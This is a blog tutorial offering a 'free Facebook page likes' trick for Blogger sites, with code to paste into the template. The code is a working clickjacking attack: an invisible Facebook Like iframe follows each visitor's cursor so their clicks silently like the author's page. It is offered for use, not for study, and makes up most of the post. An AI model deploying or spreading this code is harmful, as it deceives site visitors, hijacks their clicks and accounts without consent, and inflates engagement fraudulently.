facebook auto like for blogspot

How to Get Free Likes of Facebook Page(part 1)

Hey guys now I will write a lot of articles on geting free likes of Facebook page.This is first article.This is a trick to get free likes of Facebook page if you also have a website/blog.In future I will write about geting free likes of Facebook page if you does not have a website/blog.Read it  clearly.To get free likes of your Facebook page follow these instructions.

1.Sign in to your blogger account.
2.Click on More options then on Template.

How to Get Free Likes of Facebook Page
How to Get Free Likes of Facebook Page
                                         
3.Click on Edit HTML.
How to Get Free Likes of Facebook Page
How to Get Free Likes of Facebook Page
4.Another window will appear showing you warning not to directly edit HTML, you just have to click on Proceed.
How to Get Free Likes of Facebook Page
How to Get Free Likes of Facebook Page
5.After that click on Expand Widget Templates.
How to Get Free Likes of Facebook Page
How to Get Free Likes of Facebook Page

6.Press Ctrl+F a search bar will open at right corner and search for </head>
Paste this code exactly before </head>


<script src="http://code.jquery.com/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 50);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" )
    {
        clearInterval(interval);
        iflag=1;
    }    
}
        
</script>


7.Then search for </body>
and paste this code exactly before </body>





<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">

         <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/Modernhackerss&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
        
      <!--end facebook like frame code-->

    </div>
    
    
      <script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event)
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    }
    else
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
    }

    </script>


8.Change www.facebook.com/Modernhackerss with your Facebook page URL.
9.Then click on Save template.
Now you have done.